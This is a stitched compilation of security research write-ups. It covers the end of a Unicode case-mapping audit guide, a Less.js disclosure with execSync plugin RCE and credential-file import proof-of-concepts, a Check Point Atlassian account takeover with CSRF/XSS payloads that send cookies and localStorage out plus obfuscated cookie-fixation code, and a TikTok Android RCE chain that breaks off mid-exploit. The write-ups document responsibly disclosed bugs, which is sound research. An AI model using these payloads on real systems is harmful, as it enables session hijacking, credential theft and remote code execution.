The second highlight is that both C# and Go only support two characters for uppercasing. In terms of internationalization, it represents an incomplete case mapping implementation. But in terms of security, this further reduces the size of the already limited character set available to perform these attacks.

** The third observation is that German B in C# may not be transformed with the toUpper() function. It is, however, supported in APIs such as string.Equals(input1,input2, StringComparison.CurrentCultureIgnoreCase).

Finally, some Unicode character will result into multiple characters where only part of those are ASCII. This has limited risk, but it is possible that output value gets transformed later to only keep the ASCII ones. For example, this python code snippet illustrates a second operation where the non-ascii characters are truncated during string decoding.

>>>#First, the string is transform using uppercasing
>>> input = "\u0149orthsec".upper()              # ʼNORTHSEC
>>>#Later, the string is reimported...
 >>> encoded_bytes = bytes(input,"utf-8")         # \xca\xbcNORTHSEC
 >>> encoded_bytes.decode("ascii",errors='ignore')# NORTHSEC

Transformations are not limited to the uppercase and lowercase as you will see in the next section.

Auditing Source Code

If you are reviewing code from applications, you may be wondering which API (functions) should be reviewed. We have compiled a list below of Unicode case mapping and normalization functions. We have also included less obvious functions that under the hood applied these transformations. Standard libraries include many of those hidden transformations. We have included only those that are likely to be used when implementing security controls.

C# (.NET)

  Case mapping  Normalization  Other
Regex.IsMatch(input, regex,RegexOptions.IgnoreCase);
string.Equals(input1, input2,StringComparison.CurrentCultureIgnoreCase);
Uri(input).Host /
Uri(input).IdnHost /

Aside from the obvious functions, regex evaluation with the IgnoreCase option supports Unicode transformations. A developer should not assume that ASCII characters are the only ones to match. values extracted from regex group will not be converted implicitly.

Regex.IsMatch("hac\u212A", "HACK", RegexOptions.IgnoreCase) == true

The Uri class implicitly lowercases the hostname when the class is initialized. This would only be a security issue if the hostname is validated before with a different parser.

new Uri("http://faceboo\").Host == ""


  Case mapping  Normalization  Other

Go has a small number of functions to look for. One interesting aspect is that byte arrays can be lowercased and uppercased. The language assumes that byte arrays are UTF-8 encoded.


  Case mapping  Normalization  Other

new URI(input).toASCIIString()

URIs are not transformed by default in Java. Calling toASCIIString() will normalize characters in the canonical form (NFC). StreamSource and SAXParser classes, used for parsing of large XML files, normalize URIs and file names received. Normalization is likely to open small opportunity for path traversal in the context of blacklisted routes. “/BACKUP/” could possibly be reachable with “BAC\u212AUP”. The behavior will occur when using a File as argument. The string and InputSource arguments do not have this side effect.


  Case mapping  Normalization  Other
input.upper()re.compile(regex, re.IGNORECASE).match(input)
unicodedata.normalize(‘NFC’, input)
unicodedata.normalize(‘NFKC’, input)

Just like in C#, parsing a URL can lead to an implicit lowercasing of the hostname.

>>> import urllib.parse
>>> urllib.parse.urlparse("http://i\").hostname ==  


  Case mapping  Normalization  Other

We did not find any special APIs. The URI class is lowercasing the hostname internally. However, there is an exception that is raised if any Unicode characters other than ASCII are specified. The URI class has therefore no chance of causing harm.

Cataloging the Characters

Characters that can be transformed to ASCII characters are the most interesting for security professionals. They are likely to be confused for another intended character. The previous code snippets showed some examples that could be used in faulty logic.

To help both developers and pentesters, we have built an interactive cheat sheet. This cheat sheet can be used by developers to build regression test cases to make sure no characters are being misinterpreted. For pentesters, the list can be used to help build payloads in the context of black-box testing. For each interesting Unicode characters, we have listed the most common encodings to facilitate the integration in JSON, HTTP GET parameters, and XML payloads.

Interactive Cheat Sheet

Interactive Cheat Sheet


Although the security problems emerging from these transformations are rare, we hope that this article can help when performing code review of security-critical component that use these. By providing an exhaustive list of characters, we hope that developers will easily have good coverage of potential glitches when doing manual dynamic tests or automate regression tests.

This article does not cover any specific vulnerabilities and is meant as a reference. However, we are going to release a follow-up blog post with specific vulnerabilities in popular software products such as the Oracle JDK and Apache’s HTTPClient library. Do not miss this!



Original text by Jeremy Buis


Less (less.js) is a preprocessor language that transpiles to valid CSS code. It offers functionality to help ease the writing of CSS for websites. 

According to in their 2020 survey, Less.js was the second most popular preprocessor in terms of usage.

State of CSS - Less.js in ranking of usage
Less popularity sorted by usage in 2020

While performing a pentest for one of our Penetration Testing as a Service (PTaaS) clients, we found an application feature that enabled users to create visualizations which allowed custom styling. One of the visualizations allowed users to input valid Less code, which was transpiled on the client-side to CSS. 

This looked like a place that needed a closer look. 

Less has some interesting features, especially from a security perspective. Less before version 3.0.0 allows the inclusion of JavaScript by default with the use of the backtick operators. The following is considered valid Less code:

@bodyColor: `red`;
body {
  color: @bodyColor;


Which will output:

body {
  color: red;


Inline JavaScript evaluation was documented back in 2014 and can be seen here near the header “JavaScript Evaluation”.

JavaScript Evaluation

Standing on the shoulders of giants

RedTeam Pentesting documented the inline JavaScript backtick behaviour as a security risk in an advisory that was released in 2016.  They warned that it could lead to RCE in certain circumstances. The following is a working proof-of-concept from their excellent blog post:

$ cat cmd.less
@cmd: `global.process.mainModule.require("child_process").execSync("id")`;
.redteam { cmd: "@{cmd}" }


As a result, Less versions 3.0.0 and newer disallow inline JavaScript via backticks by default and can be reenabled via the option {javascriptEnabled: true}.

Next, we return to our PTaaS client test, where the Less version was pre 3.0.0 and transpiled on the client-side, which allowed inline JavaScript execution by default. This resulted in a nice DOM-based stored cross-site scripting vulnerability with a payload like the following:

body {
color: `alert('xss')`;


The above pops an alert that notifies the XSS payload was successful once the Less code is transpiled.

This was a great find for our client, but wasn’t enough to scratch our itch. We started probing the rest of the available features to see if there was any other dangerous behaviour that could be exploited.

The bugs

Import (inline) Syntax

The first bug is a result of the enhanced import feature of Less.js, which contains an inline mode that doesn’t interpret the requested content. This can be used to request local or remote text content and return it in the resulting CSS. 

In addition, the Less processor accepts URLs and local file references in its @import statements without restriction. This can be used for SSRF and local file disclosure when the Less code is processed on the server-side. The following steps first demonstrate a potential local file disclosure followed by a SSRF vulnerability.

Local file disclosure PoC

1. Create a Less file like the following:

// File: bad.less
@import (inline) "../../.aws/credentials"; 


2. Launch the lessc command against your less file

Less $ lessc bad.less


3. Notice the output contains the referenced file

Lessjs $ .\node_modules\.bin\lessc .\bad.less



1. Start a web server on localhost serving a Hello World message

2. Create a Less file like the following:

// File: bad.less
@import (inline) "http://localhost/"; 

Copy3. Launch the lessc command against your less file and notice the output contains the referenced external content

Lessjs $ .\node_modules\.bin\lessc .\bad.less
Hello World



The Less.js library supports plugins which can be included directly in the Less code from a remote source using the @plugin syntax. Plugins are written in JavaScript and when the Less code is interpreted, any included plugins will execute. This can lead to two outcomes depending on the context of the Less processor. If the Less code is processed on the client side, it leads to cross-site scripting. If the Less code is processed on the server-side, it leads to remote code execution. All versions of Less that support the @plugin syntax are vulnerable.

The following two snippets show example Less.js plugins.

Version 2:

// plugin-2.7.js
functions.add('cmd', function(val) {
  return val;


Version 3 and up:

// plugin-3.11.js
module.exports = {
  install: function(less, pluginManager, functions) {
    functions.add('ident', function(val) {
      return val;


Both of these can be included in the Less code in the following way and can even be fetched from a remote host:

// example local plugin usage
@plugin "plugin-2.7.js";



// example remote plugin usage
@plugin ""


The following example snippet shows how an XSS attack could be carried out:

functions.add('cmd', function(val) {
  return val;


Plugins become even more severe when transpiled on the server-side. The first two examples show version 2.7.3

The following plugin snippet (v2.7.3) shows how an attacker might achieve remote code execution (RCE):

functions.add('cmd', function(val) {
  return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;


And the malicious less that includes the plugin:

@plugin "plugin.js";

body {
color: cmd('whoami');

CopyNotice the output when the less code is transpiled  using lessc.

Lessjs Local RCE

The following is the equivalent PoC plugin for version 3.13.1:

//Vulnerable plugin (3.13.1)
    install: function(less, pluginManager, functions) {
        functions.add('cmd', function(val) {
            return global.process.mainModule.require('child_process').execSync(val.value).toString();


The malicious Less code is the same for all versions. All version of Lessjs that support plugins can be exploited using one of the PoCs from above.

Real-world example: is a popular website for creating web code snippets, and supports the standard languages plus others like Less.js. Since accepts security issues from the community, we tried our above proof of concepts to check the results of our research.

As a result, we found that it was possible to perform the above attack using plugins against their website. We were able to leak their AWS secret keys and run arbitrary commands inside their AWS Lambdas.

The following shows reading environment values using the local file inclusion bug.

// import local file PoC
import (inline) "/etc/passwd";


ec2-user:x:1000:1000:EC2 Default User:/home/ec2-user:/bin/bash
rngd:x:996:994:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin


The next screenshot shows using the Less plugin feature to gain RCE.

Less RCE PoC in action

We responsibly disclosed the issue and quickly fixed the issue.


  2. Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler
  3. Executing JavaScript In The LESS CSS Precompiler
  4. Features In-Depth | Less.js

A supply-chain breach: Taking over an Atlassian account

A supply-chain breach: Taking over an Atlassian account

Original text by Dikla Barda, Yaara Shriki, Roman Zaikin and Oded Vanunu


With more than 180,000 customers globally, and millions of users, the Australian 2002 founded company “Atlassian” develops products for software developers, project managers and other software related teams that uses the platform for data collaboration and information sharing.

While workforces globally turned to remote work as a result of the outbreak of COVID-19, tools such as the ones offered by Atlassian became more popular and critical for teams while the need for a seamless transition to a new work mode became a global necessity.

Atlassian, referring to this as “The Rise of Work Anywhere”, conducted a research about the nature of remote work during the Pandemic. The study surveyed more than 5,000 participants in Australia, France, Germany, Japan, and the US, and shows how the nuances of modern work have been amplified, demanding a shift in the way organizations manage an increasingly distributed workforce.

Breaking on through the Platform

On November 16, 2020 Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of Atlassian apps connected through SSO, Some of the affected domains are:


What makes a supply chain attack such as this one so significant is the fact that once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors that he can use in the future for his attack. This can create a severe damage which will be identified and controlled only much after the damage is done.

Check Point Research responsibly disclosed this information to the Atlassian teams which and a solution was deployed to ensure its users can safely continue to share info on the various platforms

Deep Dive

Atlassian uses SSO (Single Sign-On) to navigate between Atlassian products such as JIRA, Confluence and Partners.

Atlassian implements various web security measures such as CSP, SameSite “Strict” cookies and HttpOnly cookies. We had to bypass these security methods using a combination of several attack techniques. Overall we were able to achieve Full Account Take-Over.

First, we had to find a way to inject code into Atlassian – which we used the XSS and CSRF for. Then, using this code injection, we were able to add a new session cookie to the user’s account, and by combining the session fixation vulnerability in Atlassian domains, we were able to take over accounts.

Let us dive in into the first bug we found:


The first security issue was found on the subdomain The Training platform offers users courses or credits.
We noticed that the Content Security Policy (CSP) was configured poorly on this subdomain with ‘unsafe-inline’ and ‘unsafe-eval’ directives which allows script execution. This makes this subdomain a perfect starting point for our research

We examined the request parameters when adding courses and credits to the shopping cart. We found that when the item type is “training_credit”, an additional parameter called “options._training_credit_account” is added to request. This parameter was found vulnerable to XSS.

Let’s test a simple payload to receive all of the user’s cookies and local storage:


It works!

And we received all the cookies and the local storage of the target:


Since the Stored XSS can only be run when adding items to the shopping cart, we needed to make the user add a malicious item without their notice. Then, because there is no CSRF token we could perform CSRF attack on the shopping list and execute our payload.

In order to achieve that, we uploaded the following POC to our servers and sent it to the victim:



                <body onload=”document.forms[0].submit()”>

                   <form method=”post” action=””>

                                <input type=”hidden” name=”itemType” value=’training_credit’>

                                <input type=”hidden” name=”itemId” value=’1′>

                                <input type=”hidden” name=”options._quantity” value=’10’>

                                <input type=”hidden” name=”options._training_credit_account” value=’”><svg/onload=”window.location.href=`//${JSON.stringify(localStorage)}&c=${document.cookie}`”>’>

                                <input type=”hidden” name=”action” value=’add’>




However, some of the cookies related to the session of the victim are set to SameSite “Strict” which means the browser prevents them from being sent to the backend.

Surprisingly, we found that during the SSO process those missing cookies are completed by the backend which will essentially bypass the SameSite “Strict” for us.

SameSite “Strict” Bypass

We will now describe the SSO flow. We start with the XSS payload from our origin

During the SSO flow, the user gets redirected several times to different paths, such as: /auth/cart ,login.html, etc. Throughout the redirect process, the user goes through the authentication process, which adds the missing cookies that we needed and were protected by SameSite.
Because our payload was Stored XSS it was stored in the database and was added to the Shopping List. Here we can see that the payload was injected successfully into the page:

And the malicious item was added to the shopping cart:

At this step we bypassed SameSite “Strict” for CSRF and CSP with inline JavaScript.

However, the more interesting cookie is JSESSIONID which is protected by “HttpOnly” and we can’t hijack it via JavaScript.

At this point we can perform actions on behalf of the user but not login to his account. We dived in further into the SSO flow in order to find another flaw in the process.

HTTPOnly Bypass and Cookie Fixation

What is cookie fixation?

Cookie Fixation is when an attacker can remotely force the user to use a session cookie known to him, which becomes authenticated.

Initially, when the user browses to the login page, the server generates a new session cookie with ‘path=/’ flag. That cookie isn’t associated with any account and only after the user passes the authentication process that same cookie will be associated to his account.

We knew that using the XSS we couldn’t get the user’s session cookie, since it was protected by HTTPOnly flag. Instead, we could create a new forged one. The newly created JSESSION cookie has the same flags as the original, with one major change – the path flag.

The original path flag is set to the root directory. We were wondering what would happen if we change it to a more a particular path. It turns out that our path will have priority since it is more specific and will be used instead of the original.

We changed the path to the exact directive we know the user will get redirected to after authentication which causes the backend to authorize our cookie over the original one.

By using cookie fixation, we bypassed the HTTPOnly and hijacked the user’s Atlassian account. We will demonstrate that on the following subdomains:

We started by navigating to the URL from a clean browser without any cache to get a new clean JSESSIONID cookie.

Now, we have a JSESSIONID without any information in it at the backend. If we will send a request to the user profile page we will be redirected to the login page.

We will now perform a Cookie Fixation on the target which will force him to use the forged Cookie by using the following steps:

We start by modifying our payload and adding the following cookie:

document.cookie = "JSESSIONID= 5B09C73BF13FE923A2E5B4EE0DAD30E3;; Path=

/auth0; Secure”

Note that the original HttpOnly cookie was set for the path “/”, but the new cookie we are setting in the payload is for the path “/auth0”. Browsing to /auth0, there are 2 cookies: the real one and ours. Ours will “win” in this case because it’s more specific.

We will use the following redirect to trigger the Auth with this cookie instead of the real one. The interesting parameter here is the “redirect_uri=” which will force the authentication for


This auth request will associate our cookie to the target account.

So now that we can control the JSESSIONID, we combined all of this steps and crafted the following payload:



<body onload=”document.forms[0].submit()”>

<form method=”post” action=””>

<input type=”hidden” name=”itemType” value=’training_credit’>

<input type=”hidden” name=”itemId” value=’1′>

<input type=”hidden” name=”options._quantity” value=’10’>

<input type=”hidden” name=”options._training_credit_account” value=’”><svg/onload=”eval(atob`ZG9jdW1lbnQuY29va2llPSJKU0VTU0lPTklEPTVCMDlDNzNCRjEzRkU5MjNBMkU1QjRFRTBEQUQzMEUzOyBEb21haW49dHJhaW5pbmcuYXRsYXNzaWFuLmNvbTsgUGF0aD0vYXV0aDA7IFNlY3VyZSI7IHNldFRpbWVvdXQoZnVuY3Rpb24oKXsgbG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9hdGxhc3NpYW51bmktbGVhcm5kb3QuYXV0aDAuY29tL2F1dGhvcml6ZT9yZWRpcmVjdF91cmk9aHR0cHM6Ly90cmFpbmluZy5hdGxhc3NpYW4uY29tL2F1dGgwJmNsaWVudF9pZD1PN0ZkSFk2NDdWdmJDVHBoQkdtdmZCdDJHZGduSDdNUiZhdWRpZW5jZT1odHRwcyUzQSUyRiUyRmF0bGFzc2lhbnVuaS1sZWFybmRvdC5hdXRoMC5jb20lMkZ1c2VyaW5mbyZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwZW1haWwmcmVzcG9uc2VfdHlwZT1jb2RlJnN0YXRlPUh4RWxwUHlTc3JSdUtjWWJGT2xwOVFrTFpRN2t3RE9lbVg3RGMtNWRubGsiIH0sMzAwMCk7`)”>’>

<input type=”hidden” name=”action” value=’add’>





// Payload  Explain

btoa(‘    document.cookie=”JSESSIONID=5B09C73BF13FE923A2E5B4EE0DAD30E3;; Path=/auth0; Secure”; setTimeout(function(){ location.href=”” },3000);     ‘);


The Cookie Fixation combined with the XSS and CSRF bugs allowed us to perform full Account Take-Over on Atlassian Training Platform.

With the same flow and Cookie Fixation we can navigate to other Atlassian products, for example,

To hijack Jira accounts with the same flow, we first need to create a session cookie to perform Cookie Fixation. We log in to and take the following cookies:


In order to use these cookies for the Cookie Fixation the attacker needs to sign-out from his account to get clean JSESSIONID. We can verify that the cookie is not associated with any account anymore by sending a request to ViewProfile:

Next, we will modify our payload, we will perform the same method as we did in

document.cookie=”JSESSIONID=1672885C3F5E4819DD4EF0BF749E56C9;; Path=/plugins; Secure;”

document.cookie=”AWSALB=iAv6VKT5tbu/HFJVuu/dTE7R80wQXNjR+0opVbccE0zIadORJVGMZxCUcTIglL3OZ/A54eu/NDNLP5I3zE+WcgGWDHpv17SexjFBc1WYA9moC4wEmPooEE/Uqoo2;; Path=/plugins/; Secure;”

Note that the original HTTPOnly cookie was set for the path “/”, but the new cookie we are setting is for the path “/plugins”. Browsing to /auth0, there are 2 cookies: the real one and ours. Ours will “win” in this case because it’s a path cookie.

We will use the following redirect to trigger the Auth with this cookie instead of the real one. The interesting parameter here is the “redirect_uri=” which will force the authentication for and redirect us to /plugins.

location.href=””This auth request will associate our cookie to the target account.

As can be seen in the following request, the cookie is now assosiated to the target user (“John Doe” in this case).

So now that we can control the JSESSIONID, we combined all of this steps and crafted the following payload:



<body onload=”document.forms[0].submit()”>

<form method=”post” action=””>

<input type=”hidden” name=”itemType” value=’training_credit’>

<input type=”hidden” name=”itemId” value=’1′>

<input type=”hidden” name=”options._quantity” value=’10’>

<input type=”hidden” name=”options._training_credit_account” value=’”><svg/onload=”eval(atob`ZG9jdW1lbnQuY29va2llPSJKU0VTU0lPTklEPTE2NzI4ODVDM0Y1RTQ4MTlERDRFRjBCRjc0OUU1NkM5OyBEb21haW49LmF0bGFzc2lhbi5jb207IFBhdGg9L3BsdWdpbnM7IFNlY3VyZTsiOyAgZG9jdW1lbnQuY29va2llPSJBV1NBTEI9aUF2NlZLVDV0YnUvSEZKVnV1L2RURTdSODB3UVhOalIrMG9wVmJjY0UweklhZE9SSlZHTVp4Q1VjVElnbEwzT1ovQTU0ZXUvTkROTFA1STN6RStXY2dHV0RIcHYxN1NleGpGQmMxV1lBOW1vQzR3RW1Qb29FRS9VcW9vMjsgRG9tYWluPS5hdGxhc3NpYW4uY29tOyBQYXRoPS9wbHVnaW5zLzsgU2VjdXJlOyI7ICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7IGxvY2F0aW9uLmhyZWY9Imh0dHBzOi8vYXV0aC5hdGxhc3NpYW4uY29tL2F1dGhvcml6ZT9yZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZqaXJhLmF0bGFzc2lhbi5jb20lMkZwbHVnaW5zJTJGc2VydmxldCUyRmF1dGhlbnRpY2F0aW9uJTNGYXV0aF9wbHVnaW5fb3JpZ2luYWxfdXJsJTNEaHR0cHMlMjUzQSUyNTJGJTI1MkZqaXJhLmF0bGFzc2lhbi5jb20lMjUyRiZjbGllbnRfaWQ9UXhVVmg5dFR1Z29MQzVjZ1kzVmprejNoMWpQU3ZHOXAmc2NvcGU9b3BlbmlkK2VtYWlsK3Byb2ZpbGUmc3RhdGU9NDExOGY1N2YtYTlkOS00ZjZkLWExZDUtYWRkOTM5NzYyZjIzJnJlc3BvbnNlX3R5cGU9Y29kZSZwcm9tcHQ9bm9uZSIgfSwzMDAwKTs=`);”>’>

<input type=”hidden” name=”action” value=’add’>





// Payload


document.cookie=”JSESSIONID=1672885C3F5E4819DD4EF0BF749E56C9;; Path=/plugins; Secure;”;

document.cookie=”AWSALB=iAv6VKT5tbu/HFJVuu/dTE7R80wQXNjR+0opVbccE0zIadORJVGMZxCUcTIglL3OZ/A54eu/NDNLP5I3zE+WcgGWDHpv17SexjFBc1WYA9moC4wEmPooEE/Uqoo2;; Path=/plugins/; Secure;”;






The Cookie Fixation combined with the XSS and CSRF bugs from allowed us to perform full Account Take-Over on


Another direction we looked into was checking if we could inject malicious code to an Organization’s Bitbucket. Bitbucket is a Git-based source code repository hosting service owned by Atlassian and has more than 10 million users. Accessing a company’s Bitbucket repositories could allow attackers to access and change source code, make it public or even plant backdoors.

With a Jira account at our hands, we have a few ways to obtain Bitbucket account. One option is by opening a Jira ticket with malicious link to an attacker controlled website.

An automatic mail will be sent from Atlassian domain to the user once the ticket is created on Jira systems. An attacker can take advantage of that and include in the ticket a link to a malicious website that steals the user’s credentials.


By using the XSS with CSRF that we found on combined with the method of Cookie fixation we were able to take over any Atlassian account, in just one click, on every subdomain under that doesn’t use JWT for the session and that is vulnerable to session fixation . For example:,, and more.

Taking over an account in such a collaborative platform means an ability to take over data that is not meant for unauthorized view.

Check Point Research responsibly disclosed this information to the Atlassian teams which and a solution was deployed to ensure its users can safely continue to share info on the various platforms

POC Video:

TikTok for Android 1-Click RCE

TikTok for Android 1-Click RCE

Original text by Sayed Abdelhafiz


While testing TikTok for Android Application, I identified multiple bugs that can be chained to achieve Remote code execution that can be triaged through multiple dangerous attack vectors. In this write-up, we will discuss every bug and chain altogether. I worked on it for about 21-day, a long time. The final exploit was simple. The long time I spent in this exploit got me incredible experience and an important trick that helped me a lot in the exploit. TikTok implemented a fix to address the bugs identified, and it was retested to confirm the resolution.


  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

Universal XSS on TikTok WebView

TikTok uses a specific WebView that can be invoked by deep-link, Inbox Messages. The WebView handle something called falcon links by grabbing it from the internal files instead of fetching it from their server every time the user uses it to increase the performance.

For performance measuring purposes, after finishing loading the page. The following function will get executed:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea got on my mind is injecting XSS Payload in the URL to escape the function call and execute my malicious code.

I tried the following link'),alert(1));//

Unfortunately, It didn’t work. I write a Frida script to hook android.webkit.WebView.evaluateJavascript Method to see what happens?

I found the following string is passed to the method:


The payload is getting encoded because It was in the query string segment. So I decided to put the payload in the fragment segment After #'),alert(1));// will fire the following line:


Now, It’s done! We have Universal XSS in that WebView.

Notice: It’s Universal XSS because that javascript code is fired if the link contains something like:

For example, will fire this XSS too.


After find this XSS, I started digging in that WebView to see how It can be harmful.

First, I set up my lab to make it easy for my testing. I have enabled WebViewDebug module to debug the WebView from my dev-tools in google chrome. You find the module here:

I found that WebView supports the intent scheme. This scheme can make you able to build a customize intent and launch it as an activity. It’s helpful to avoid the export setting of the non-exported activities and maximize the testing scope.

Read the following paper for more information about this intent and how to implents:

I tried to execute the following javascript code to open Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect of executing that javascript. I back to the WebViewClient to see what was happening. And the following code came:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
v8.i = false;
v4 = true;
else {
v4 = v0_7;

This code restricts the intent scheme to takes effect unless the user has just clicked anywhere. Bad! I don’t prefer 2-click exploits. I saved it in my note and continue my digging trip.

ToutiaoJSBridge, It’s a bridge implemented in the WebView. It has many fruit functions, one of them was openSchema that used to open internal deep-links. There a deep link called aweme://wiki It used to open URLs on AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity Implementing URL validation to make sure that no black URL would be opened in it. But the validation was in http or https schemes only. Because they think that any other scheme is invalid and don’t need to validate:

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

Pretty cool, If the validation is not on the javascript scheme. We can use that scheme to perform XSS attacks on that WebView too!

"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": ""

<h1>PoC</h1> got printed on the WebView

Start Arbitrary Components

The good news is AddWikiActivity WebView supports the the intent scheme too without any restriction but if disable_app_link parameter was set to false. Easy man!

if the following code got execute in AddWikiActivity The UserFavoritesActivity will get invoked:


Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: the splits packages don’t attach in the APK. It got downloaded after the first launch of the application by google play core. You can find those package by: adb shell pm path {package_name}

In a nutshell, TmaTestActivity was used to update the SDK by downloading a zip from the internet and extract it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
m.a(v5, "testUri");
this.updateJssdk(arg4, v5, arg6);

To Invoke the update process we have to set action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
String v0 = arg6.getQueryParameter("sdkUpdateVersion");
String v1 = arg6.getQueryParameter("sdkVersion");
String v6 = arg6.getQueryParameter("latestSDKUrl");
SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
v2.putString("sdk_update_version", v0).apply();
v2.putString("sdk_version", v1).apply();
v2.putString("latest_sdk_url", v6).apply();
DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
BundleHandlerParam v0_1 = new BundleHandlerParam();
v6_1.setInitialParam(arg5, v0_1);
ResolveDownloadHandler v5 = new ResolveDownloadHandler();
SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();

It collects the SDK updating information from the parameters, then invoke DownloadBaseBundleHandler instance, then set the next handler to ResolveDownloadHandler, then SetCurrentProcessBundleVersionHandler

Let’s start with DownloadBaseBundleHandler. It checks sdkUpdateVersion parameter to see if it was newer than the current one or not. We can set the value to 99.99.99 to avoid this check, then starting the download:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
v10.appendLog("no need update remote basebundle version");
arg15.isIgnoreTask = true;
return arg15;
this.startDownload(v9, v10, arg15, v0, v8);

In startDownload Method, I found that:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext and it must have an Instance. Unfortunately, the application didn’t init this instance all time. But I told you that I spent 21-day on this exploit, yeah!? It was enough for me to gain extensive knowledge about the application workflow. And yes! I saw somewhere this instance getting inited.

Invoking the preloadMiniApp function through ToutiaoJSBridge was able to init the instance for me! It was easy for me! Digging on every function on this bridge, even It doesn’t look helpful for me for the first time, but it became useful in this situation ;).

v2.b is the md5sum of the downloading file. It gets from the filename itself:

private String getMd5FromUrl(String arg3) {
return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));

The filename must look like: anything_{md5sum_of_file}.zip because the md5sum will be compared with the file md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
long v6 = this.val$beginDownloadTime.getMillisAfterStart();
if(!v11.exists()) {
this.val$baseBundleEvent.appendLog("remote basebundle download fail");
this.val$param.isLastTaskSuccess = false;
this.val$baseBundleEvent.appendLog("remote basebundle not exist");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
this.val$param.isLastTaskSuccess = true;
this.val$param.targetZipFile = v11;
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
else {
this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
this.val$param.isLastTaskSuccess = false;

After download processing finished, the file gets passed to ResolveDownloadHandler, to unzip It:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
BaseBundleEvent v0 = arg14.baseBundleEvent;
if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
long v10;
boolean v4;
Class v0 = BaseBundleFileManager.class;
synchronized(v0) {
boolean v1 = arg9.exists();
if(!v1) {
return 0L;
try {
File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
arg12.appendLog("start unzip" + arg10);
BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
try {
arg2.appendLog("unzip" + arg3);
IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
}public static void unZipFolder(String arg1, String arg2) throws Exception {
IOUtils.a(new FileInputStream(arg1), arg2, false);
}private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
ZipInputStream v0 = new ZipInputStream(arg5);
while(true) {
ZipEntry v5 = v0.getNextEntry();
if(v5 == null) {
String v1 = v5.getName();
if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Are you notice arg7?
goto label_2;
if(v5.isDirectory()) {
new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
goto label_2;
File v5_1 = new File(arg6 + File.separator + v1);
if(!v5_1.getParentFile().exists()) {
FileOutputStream v1_1 = new FileOutputStream(v5_1);
byte[] v5_2 = new byte[0x400];
while(true) {
int v3 =;
if(v3 == -1) {
v1_1.write(v5_2, 0, v3);

In the last method called to unzip the file, there is a check for path traversal, but because arg7 value is false, the check won’t happen! Perfect!!

It makes us able to exploit ZIP Slip and overwrite some delicious files.

Time for RCE!

